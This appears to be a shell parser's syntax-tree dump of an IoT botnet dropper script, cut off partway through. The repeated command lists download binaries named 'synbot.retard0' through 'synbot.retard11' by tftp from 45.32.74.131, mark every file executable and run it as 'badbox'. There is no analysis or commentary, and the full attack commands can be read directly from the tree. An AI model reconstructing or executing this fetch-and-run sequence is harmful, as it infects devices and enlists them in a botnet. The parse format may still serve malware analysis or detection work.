CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 189), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 142), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 111), word='-r'),
    WordNode(lineno=4, pos=(112, 126), word='synbot.retard0'),
    WordNode(lineno=4, pos=(127, 129), word='-g'),
    WordNode(lineno=4, pos=(130, 142), word='45.32.74.131'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(142, 143)),
  CommandNode(lineno=4, pos=(143, 169), parts=[
    WordNode(lineno=4, pos=(143, 146), word='cat'),
    WordNode(lineno=4, pos=(147, 161), word='synbot.retard0'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(163, 169), word='badbox'), pos=(162, 169), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(169, 170)),
  CommandNode(lineno=4, pos=(170, 180), parts=[
    WordNode(lineno=4, pos=(170, 175), word='chmod'),
    WordNode(lineno=4, pos=(176, 178), word='+x'),
    WordNode(lineno=4, pos=(179, 180), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(180, 181)),
  CommandNode(lineno=4, pos=(181, 189), parts=[
    WordNode(lineno=4, pos=(181, 189), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(190, 330), parts=[
  CommandNode(lineno=5, pos=(190, 197), parts=[
    WordNode(lineno=5, pos=(190, 192), word='cd'),
    WordNode(lineno=5, pos=(193, 197), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(198, 200)),
  CommandNode(lineno=5, pos=(201, 212), parts=[
    WordNode(lineno=5, pos=(201, 203), word='cd'),
    WordNode(lineno=5, pos=(204, 212), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(213, 215)),
  CommandNode(lineno=5, pos=(216, 223), parts=[
    WordNode(lineno=5, pos=(216, 218), word='cd'),
    WordNode(lineno=5, pos=(219, 223), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(224, 226)),
  CommandNode(lineno=5, pos=(227, 235), parts=[
    WordNode(lineno=5, pos=(227, 229), word='cd'),
    WordNode(lineno=5, pos=(230, 235), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(236, 238)),
  CommandNode(lineno=5, pos=(239, 243), parts=[
    WordNode(lineno=5, pos=(239, 241), word='cd'),
    WordNode(lineno=5, pos=(242, 243), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(243, 244)),
  CommandNode(lineno=5, pos=(245, 283), parts=[
    WordNode(lineno=5, pos=(245, 249), word='tftp'),
    WordNode(lineno=5, pos=(250, 252), word='-r'),
    WordNode(lineno=5, pos=(253, 267), word='synbot.retard1'),
    WordNode(lineno=5, pos=(268, 270), word='-g'),
    WordNode(lineno=5, pos=(271, 283), word='45.32.74.131'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(283, 284)),
  CommandNode(lineno=5, pos=(284, 310), parts=[
    WordNode(lineno=5, pos=(284, 287), word='cat'),
    WordNode(lineno=5, pos=(288, 302), word='synbot.retard1'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(304, 310), word='badbox'), pos=(303, 310), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(310, 311)),
  CommandNode(lineno=5, pos=(311, 321), parts=[
    WordNode(lineno=5, pos=(311, 316), word='chmod'),
    WordNode(lineno=5, pos=(317, 319), word='+x'),
    WordNode(lineno=5, pos=(320, 321), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(321, 322)),
  CommandNode(lineno=5, pos=(322, 330), parts=[
    WordNode(lineno=5, pos=(322, 330), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(331, 471), parts=[
  CommandNode(lineno=6, pos=(331, 338), parts=[
    WordNode(lineno=6, pos=(331, 333), word='cd'),
    WordNode(lineno=6, pos=(334, 338), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(339, 341)),
  CommandNode(lineno=6, pos=(342, 353), parts=[
    WordNode(lineno=6, pos=(342, 344), word='cd'),
    WordNode(lineno=6, pos=(345, 353), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(354, 356)),
  CommandNode(lineno=6, pos=(357, 364), parts=[
    WordNode(lineno=6, pos=(357, 359), word='cd'),
    WordNode(lineno=6, pos=(360, 364), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(365, 367)),
  CommandNode(lineno=6, pos=(368, 376), parts=[
    WordNode(lineno=6, pos=(368, 370), word='cd'),
    WordNode(lineno=6, pos=(371, 376), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(377, 379)),
  CommandNode(lineno=6, pos=(380, 384), parts=[
    WordNode(lineno=6, pos=(380, 382), word='cd'),
    WordNode(lineno=6, pos=(383, 384), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(384, 385)),
  CommandNode(lineno=6, pos=(386, 424), parts=[
    WordNode(lineno=6, pos=(386, 390), word='tftp'),
    WordNode(lineno=6, pos=(391, 393), word='-r'),
    WordNode(lineno=6, pos=(394, 408), word='synbot.retard2'),
    WordNode(lineno=6, pos=(409, 411), word='-g'),
    WordNode(lineno=6, pos=(412, 424), word='45.32.74.131'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(424, 425)),
  CommandNode(lineno=6, pos=(425, 451), parts=[
    WordNode(lineno=6, pos=(425, 428), word='cat'),
    WordNode(lineno=6, pos=(429, 443), word='synbot.retard2'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(445, 451), word='badbox'), pos=(444, 451), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(451, 452)),
  CommandNode(lineno=6, pos=(452, 462), parts=[
    WordNode(lineno=6, pos=(452, 457), word='chmod'),
    WordNode(lineno=6, pos=(458, 460), word='+x'),
    WordNode(lineno=6, pos=(461, 462), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(462, 463)),
  CommandNode(lineno=6, pos=(463, 471), parts=[
    WordNode(lineno=6, pos=(463, 471), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(472, 612), parts=[
  CommandNode(lineno=7, pos=(472, 479), parts=[
    WordNode(lineno=7, pos=(472, 474), word='cd'),
    WordNode(lineno=7, pos=(475, 479), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(480, 482)),
  CommandNode(lineno=7, pos=(483, 494), parts=[
    WordNode(lineno=7, pos=(483, 485), word='cd'),
    WordNode(lineno=7, pos=(486, 494), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(495, 497)),
  CommandNode(lineno=7, pos=(498, 505), parts=[
    WordNode(lineno=7, pos=(498, 500), word='cd'),
    WordNode(lineno=7, pos=(501, 505), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(506, 508)),
  CommandNode(lineno=7, pos=(509, 517), parts=[
    WordNode(lineno=7, pos=(509, 511), word='cd'),
    WordNode(lineno=7, pos=(512, 517), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(518, 520)),
  CommandNode(lineno=7, pos=(521, 525), parts=[
    WordNode(lineno=7, pos=(521, 523), word='cd'),
    WordNode(lineno=7, pos=(524, 525), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(525, 526)),
  CommandNode(lineno=7, pos=(527, 565), parts=[
    WordNode(lineno=7, pos=(527, 531), word='tftp'),
    WordNode(lineno=7, pos=(532, 534), word='-r'),
    WordNode(lineno=7, pos=(535, 549), word='synbot.retard3'),
    WordNode(lineno=7, pos=(550, 552), word='-g'),
    WordNode(lineno=7, pos=(553, 565), word='45.32.74.131'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(565, 566)),
  CommandNode(lineno=7, pos=(566, 592), parts=[
    WordNode(lineno=7, pos=(566, 569), word='cat'),
    WordNode(lineno=7, pos=(570, 584), word='synbot.retard3'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(586, 592), word='badbox'), pos=(585, 592), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(592, 593)),
  CommandNode(lineno=7, pos=(593, 603), parts=[
    WordNode(lineno=7, pos=(593, 598), word='chmod'),
    WordNode(lineno=7, pos=(599, 601), word='+x'),
    WordNode(lineno=7, pos=(602, 603), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(603, 604)),
  CommandNode(lineno=7, pos=(604, 612), parts=[
    WordNode(lineno=7, pos=(604, 612), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(613, 753), parts=[
  CommandNode(lineno=8, pos=(613, 620), parts=[
    WordNode(lineno=8, pos=(613, 615), word='cd'),
    WordNode(lineno=8, pos=(616, 620), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(621, 623)),
  CommandNode(lineno=8, pos=(624, 635), parts=[
    WordNode(lineno=8, pos=(624, 626), word='cd'),
    WordNode(lineno=8, pos=(627, 635), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(636, 638)),
  CommandNode(lineno=8, pos=(639, 646), parts=[
    WordNode(lineno=8, pos=(639, 641), word='cd'),
    WordNode(lineno=8, pos=(642, 646), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(647, 649)),
  CommandNode(lineno=8, pos=(650, 658), parts=[
    WordNode(lineno=8, pos=(650, 652), word='cd'),
    WordNode(lineno=8, pos=(653, 658), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(659, 661)),
  CommandNode(lineno=8, pos=(662, 666), parts=[
    WordNode(lineno=8, pos=(662, 664), word='cd'),
    WordNode(lineno=8, pos=(665, 666), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(666, 667)),
  CommandNode(lineno=8, pos=(668, 706), parts=[
    WordNode(lineno=8, pos=(668, 672), word='tftp'),
    WordNode(lineno=8, pos=(673, 675), word='-r'),
    WordNode(lineno=8, pos=(676, 690), word='synbot.retard4'),
    WordNode(lineno=8, pos=(691, 693), word='-g'),
    WordNode(lineno=8, pos=(694, 706), word='45.32.74.131'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(706, 707)),
  CommandNode(lineno=8, pos=(707, 733), parts=[
    WordNode(lineno=8, pos=(707, 710), word='cat'),
    WordNode(lineno=8, pos=(711, 725), word='synbot.retard4'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(727, 733), word='badbox'), pos=(726, 733), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(733, 734)),
  CommandNode(lineno=8, pos=(734, 744), parts=[
    WordNode(lineno=8, pos=(734, 739), word='chmod'),
    WordNode(lineno=8, pos=(740, 742), word='+x'),
    WordNode(lineno=8, pos=(743, 744), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(744, 745)),
  CommandNode(lineno=8, pos=(745, 753), parts=[
    WordNode(lineno=8, pos=(745, 753), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(754, 894), parts=[
  CommandNode(lineno=9, pos=(754, 761), parts=[
    WordNode(lineno=9, pos=(754, 756), word='cd'),
    WordNode(lineno=9, pos=(757, 761), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(762, 764)),
  CommandNode(lineno=9, pos=(765, 776), parts=[
    WordNode(lineno=9, pos=(765, 767), word='cd'),
    WordNode(lineno=9, pos=(768, 776), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(777, 779)),
  CommandNode(lineno=9, pos=(780, 787), parts=[
    WordNode(lineno=9, pos=(780, 782), word='cd'),
    WordNode(lineno=9, pos=(783, 787), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(788, 790)),
  CommandNode(lineno=9, pos=(791, 799), parts=[
    WordNode(lineno=9, pos=(791, 793), word='cd'),
    WordNode(lineno=9, pos=(794, 799), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(800, 802)),
  CommandNode(lineno=9, pos=(803, 807), parts=[
    WordNode(lineno=9, pos=(803, 805), word='cd'),
    WordNode(lineno=9, pos=(806, 807), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(807, 808)),
  CommandNode(lineno=9, pos=(809, 847), parts=[
    WordNode(lineno=9, pos=(809, 813), word='tftp'),
    WordNode(lineno=9, pos=(814, 816), word='-r'),
    WordNode(lineno=9, pos=(817, 831), word='synbot.retard5'),
    WordNode(lineno=9, pos=(832, 834), word='-g'),
    WordNode(lineno=9, pos=(835, 847), word='45.32.74.131'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(847, 848)),
  CommandNode(lineno=9, pos=(848, 874), parts=[
    WordNode(lineno=9, pos=(848, 851), word='cat'),
    WordNode(lineno=9, pos=(852, 866), word='synbot.retard5'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(868, 874), word='badbox'), pos=(867, 874), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(874, 875)),
  CommandNode(lineno=9, pos=(875, 885), parts=[
    WordNode(lineno=9, pos=(875, 880), word='chmod'),
    WordNode(lineno=9, pos=(881, 883), word='+x'),
    WordNode(lineno=9, pos=(884, 885), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(885, 886)),
  CommandNode(lineno=9, pos=(886, 894), parts=[
    WordNode(lineno=9, pos=(886, 894), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(895, 1035), parts=[
  CommandNode(lineno=10, pos=(895, 902), parts=[
    WordNode(lineno=10, pos=(895, 897), word='cd'),
    WordNode(lineno=10, pos=(898, 902), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(903, 905)),
  CommandNode(lineno=10, pos=(906, 917), parts=[
    WordNode(lineno=10, pos=(906, 908), word='cd'),
    WordNode(lineno=10, pos=(909, 917), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(918, 920)),
  CommandNode(lineno=10, pos=(921, 928), parts=[
    WordNode(lineno=10, pos=(921, 923), word='cd'),
    WordNode(lineno=10, pos=(924, 928), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(929, 931)),
  CommandNode(lineno=10, pos=(932, 940), parts=[
    WordNode(lineno=10, pos=(932, 934), word='cd'),
    WordNode(lineno=10, pos=(935, 940), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(941, 943)),
  CommandNode(lineno=10, pos=(944, 948), parts=[
    WordNode(lineno=10, pos=(944, 946), word='cd'),
    WordNode(lineno=10, pos=(947, 948), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(948, 949)),
  CommandNode(lineno=10, pos=(950, 988), parts=[
    WordNode(lineno=10, pos=(950, 954), word='tftp'),
    WordNode(lineno=10, pos=(955, 957), word='-r'),
    WordNode(lineno=10, pos=(958, 972), word='synbot.retard6'),
    WordNode(lineno=10, pos=(973, 975), word='-g'),
    WordNode(lineno=10, pos=(976, 988), word='45.32.74.131'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(988, 989)),
  CommandNode(lineno=10, pos=(989, 1015), parts=[
    WordNode(lineno=10, pos=(989, 992), word='cat'),
    WordNode(lineno=10, pos=(993, 1007), word='synbot.retard6'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(1009, 1015), word='badbox'), pos=(1008, 1015), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1015, 1016)),
  CommandNode(lineno=10, pos=(1016, 1026), parts=[
    WordNode(lineno=10, pos=(1016, 1021), word='chmod'),
    WordNode(lineno=10, pos=(1022, 1024), word='+x'),
    WordNode(lineno=10, pos=(1025, 1026), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1026, 1027)),
  CommandNode(lineno=10, pos=(1027, 1035), parts=[
    WordNode(lineno=10, pos=(1027, 1035), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(1036, 1176), parts=[
  CommandNode(lineno=11, pos=(1036, 1043), parts=[
    WordNode(lineno=11, pos=(1036, 1038), word='cd'),
    WordNode(lineno=11, pos=(1039, 1043), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1044, 1046)),
  CommandNode(lineno=11, pos=(1047, 1058), parts=[
    WordNode(lineno=11, pos=(1047, 1049), word='cd'),
    WordNode(lineno=11, pos=(1050, 1058), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1059, 1061)),
  CommandNode(lineno=11, pos=(1062, 1069), parts=[
    WordNode(lineno=11, pos=(1062, 1064), word='cd'),
    WordNode(lineno=11, pos=(1065, 1069), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1070, 1072)),
  CommandNode(lineno=11, pos=(1073, 1081), parts=[
    WordNode(lineno=11, pos=(1073, 1075), word='cd'),
    WordNode(lineno=11, pos=(1076, 1081), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1082, 1084)),
  CommandNode(lineno=11, pos=(1085, 1089), parts=[
    WordNode(lineno=11, pos=(1085, 1087), word='cd'),
    WordNode(lineno=11, pos=(1088, 1089), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1089, 1090)),
  CommandNode(lineno=11, pos=(1091, 1129), parts=[
    WordNode(lineno=11, pos=(1091, 1095), word='tftp'),
    WordNode(lineno=11, pos=(1096, 1098), word='-r'),
    WordNode(lineno=11, pos=(1099, 1113), word='synbot.retard7'),
    WordNode(lineno=11, pos=(1114, 1116), word='-g'),
    WordNode(lineno=11, pos=(1117, 1129), word='45.32.74.131'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1129, 1130)),
  CommandNode(lineno=11, pos=(1130, 1156), parts=[
    WordNode(lineno=11, pos=(1130, 1133), word='cat'),
    WordNode(lineno=11, pos=(1134, 1148), word='synbot.retard7'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(1150, 1156), word='badbox'), pos=(1149, 1156), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1156, 1157)),
  CommandNode(lineno=11, pos=(1157, 1167), parts=[
    WordNode(lineno=11, pos=(1157, 1162), word='chmod'),
    WordNode(lineno=11, pos=(1163, 1165), word='+x'),
    WordNode(lineno=11, pos=(1166, 1167), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1167, 1168)),
  CommandNode(lineno=11, pos=(1168, 1176), parts=[
    WordNode(lineno=11, pos=(1168, 1176), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1177, 1317), parts=[
  CommandNode(lineno=12, pos=(1177, 1184), parts=[
    WordNode(lineno=12, pos=(1177, 1179), word='cd'),
    WordNode(lineno=12, pos=(1180, 1184), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1185, 1187)),
  CommandNode(lineno=12, pos=(1188, 1199), parts=[
    WordNode(lineno=12, pos=(1188, 1190), word='cd'),
    WordNode(lineno=12, pos=(1191, 1199), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1200, 1202)),
  CommandNode(lineno=12, pos=(1203, 1210), parts=[
    WordNode(lineno=12, pos=(1203, 1205), word='cd'),
    WordNode(lineno=12, pos=(1206, 1210), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1211, 1213)),
  CommandNode(lineno=12, pos=(1214, 1222), parts=[
    WordNode(lineno=12, pos=(1214, 1216), word='cd'),
    WordNode(lineno=12, pos=(1217, 1222), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1223, 1225)),
  CommandNode(lineno=12, pos=(1226, 1230), parts=[
    WordNode(lineno=12, pos=(1226, 1228), word='cd'),
    WordNode(lineno=12, pos=(1229, 1230), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1230, 1231)),
  CommandNode(lineno=12, pos=(1232, 1270), parts=[
    WordNode(lineno=12, pos=(1232, 1236), word='tftp'),
    WordNode(lineno=12, pos=(1237, 1239), word='-r'),
    WordNode(lineno=12, pos=(1240, 1254), word='synbot.retard8'),
    WordNode(lineno=12, pos=(1255, 1257), word='-g'),
    WordNode(lineno=12, pos=(1258, 1270), word='45.32.74.131'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1270, 1271)),
  CommandNode(lineno=12, pos=(1271, 1297), parts=[
    WordNode(lineno=12, pos=(1271, 1274), word='cat'),
    WordNode(lineno=12, pos=(1275, 1289), word='synbot.retard8'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1291, 1297), word='badbox'), pos=(1290, 1297), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1297, 1298)),
  CommandNode(lineno=12, pos=(1298, 1308), parts=[
    WordNode(lineno=12, pos=(1298, 1303), word='chmod'),
    WordNode(lineno=12, pos=(1304, 1306), word='+x'),
    WordNode(lineno=12, pos=(1307, 1308), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1308, 1309)),
  CommandNode(lineno=12, pos=(1309, 1317), parts=[
    WordNode(lineno=12, pos=(1309, 1317), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1318, 1458), parts=[
  CommandNode(lineno=13, pos=(1318, 1325), parts=[
    WordNode(lineno=13, pos=(1318, 1320), word='cd'),
    WordNode(lineno=13, pos=(1321, 1325), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1326, 1328)),
  CommandNode(lineno=13, pos=(1329, 1340), parts=[
    WordNode(lineno=13, pos=(1329, 1331), word='cd'),
    WordNode(lineno=13, pos=(1332, 1340), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1341, 1343)),
  CommandNode(lineno=13, pos=(1344, 1351), parts=[
    WordNode(lineno=13, pos=(1344, 1346), word='cd'),
    WordNode(lineno=13, pos=(1347, 1351), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1352, 1354)),
  CommandNode(lineno=13, pos=(1355, 1363), parts=[
    WordNode(lineno=13, pos=(1355, 1357), word='cd'),
    WordNode(lineno=13, pos=(1358, 1363), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1364, 1366)),
  CommandNode(lineno=13, pos=(1367, 1371), parts=[
    WordNode(lineno=13, pos=(1367, 1369), word='cd'),
    WordNode(lineno=13, pos=(1370, 1371), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1371, 1372)),
  CommandNode(lineno=13, pos=(1373, 1411), parts=[
    WordNode(lineno=13, pos=(1373, 1377), word='tftp'),
    WordNode(lineno=13, pos=(1378, 1380), word='-r'),
    WordNode(lineno=13, pos=(1381, 1395), word='synbot.retard9'),
    WordNode(lineno=13, pos=(1396, 1398), word='-g'),
    WordNode(lineno=13, pos=(1399, 1411), word='45.32.74.131'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1411, 1412)),
  CommandNode(lineno=13, pos=(1412, 1438), parts=[
    WordNode(lineno=13, pos=(1412, 1415), word='cat'),
    WordNode(lineno=13, pos=(1416, 1430), word='synbot.retard9'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1432, 1438), word='badbox'), pos=(1431, 1438), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1438, 1439)),
  CommandNode(lineno=13, pos=(1439, 1449), parts=[
    WordNode(lineno=13, pos=(1439, 1444), word='chmod'),
    WordNode(lineno=13, pos=(1445, 1447), word='+x'),
    WordNode(lineno=13, pos=(1448, 1449), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1449, 1450)),
  CommandNode(lineno=13, pos=(1450, 1458), parts=[
    WordNode(lineno=13, pos=(1450, 1458), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1459, 1601), parts=[
  CommandNode(lineno=14, pos=(1459, 1466), parts=[
    WordNode(lineno=14, pos=(1459, 1461), word='cd'),
    WordNode(lineno=14, pos=(1462, 1466), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1467, 1469)),
  CommandNode(lineno=14, pos=(1470, 1481), parts=[
    WordNode(lineno=14, pos=(1470, 1472), word='cd'),
    WordNode(lineno=14, pos=(1473, 1481), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1482, 1484)),
  CommandNode(lineno=14, pos=(1485, 1492), parts=[
    WordNode(lineno=14, pos=(1485, 1487), word='cd'),
    WordNode(lineno=14, pos=(1488, 1492), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1493, 1495)),
  CommandNode(lineno=14, pos=(1496, 1504), parts=[
    WordNode(lineno=14, pos=(1496, 1498), word='cd'),
    WordNode(lineno=14, pos=(1499, 1504), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1505, 1507)),
  CommandNode(lineno=14, pos=(1508, 1512), parts=[
    WordNode(lineno=14, pos=(1508, 1510), word='cd'),
    WordNode(lineno=14, pos=(1511, 1512), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1512, 1513)),
  CommandNode(lineno=14, pos=(1514, 1553), parts=[
    WordNode(lineno=14, pos=(1514, 1518), word='tftp'),
    WordNode(lineno=14, pos=(1519, 1521), word='-r'),
    WordNode(lineno=14, pos=(1522, 1537), word='synbot.retard10'),
    WordNode(lineno=14, pos=(1538, 1540), word='-g'),
    WordNode(lineno=14, pos=(1541, 1553), word='45.32.74.131'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1553, 1554)),
  CommandNode(lineno=14, pos=(1554, 1581), parts=[
    WordNode(lineno=14, pos=(1554, 1557), word='cat'),
    WordNode(lineno=14, pos=(1558, 1573), word='synbot.retard10'),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1575, 1581), word='badbox'), pos=(1574, 1581), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1581, 1582)),
  CommandNode(lineno=14, pos=(1582, 1592), parts=[
    WordNode(lineno=14, pos=(1582, 1587), word='chmod'),
    WordNode(lineno=14, pos=(1588, 1590), word='+x'),
    WordNode(lineno=14, pos=(1591, 1592), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1592, 1593)),
  CommandNode(lineno=14, pos=(1593, 1601), parts=[
    WordNode(lineno=14, pos=(1593, 1601), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1602, 1744), parts=[
  CommandNode(lineno=15, pos=(1602, 1609), parts=[
    WordNode(lineno=15, pos=(1602, 1604), word='cd'),
    WordNode(lineno=15, pos=(1605, 1609), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1610, 1612)),
  CommandNode(lineno=15, pos=(1613, 1624), parts=[
    WordNode(lineno=15, pos=(1613, 1615), word='cd'),
    WordNode(lineno=15, pos=(1616, 1624), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1625, 1627)),
  CommandNode(lineno=15, pos=(1628, 1635), parts=[
    WordNode(lineno=15, pos=(1628, 1630), word='cd'),
    WordNode(lineno=15, pos=(1631, 1635), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1636, 1638)),
  CommandNode(lineno=15, pos=(1639, 1647), parts=[
    WordNode(lineno=15, pos=(1639, 1641), word='cd'),
    WordNode(lineno=15, pos=(1642, 1647), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1648, 1650)),
  CommandNode(lineno=15, pos=(1651, 1655), parts=[
    WordNode(lineno=15, pos=(1651, 1653), word='cd'),
    WordNode(lineno=15, pos=(1654, 1655), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1655, 1656)),
  CommandNode(lineno=15, pos=(1657, 1696), parts=[
    WordNode(lineno=15, pos=(1657, 1661), word='tftp'),
    WordNode(lineno=15, pos=(1662, 1664), word='-r'),
    WordNode(lineno=15, pos=(1665, 1680), word='synbot.retard11'),
    WordNode(lineno=15, pos=(1681, 1683), word='-g'),
    WordNode(lineno=15, pos=(1684, 1696), word='45.32.74.131'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1696, 1697)),
  CommandNode(lineno=15, pos=(1697, 1724), parts=[
    WordNode(lineno=15, pos=(1697, 1700), word='cat'),
    WordNode(lineno=15, pos=(1701, 1716), word='synbot.retard11'),
    RedirectNode(lineno=15, output=
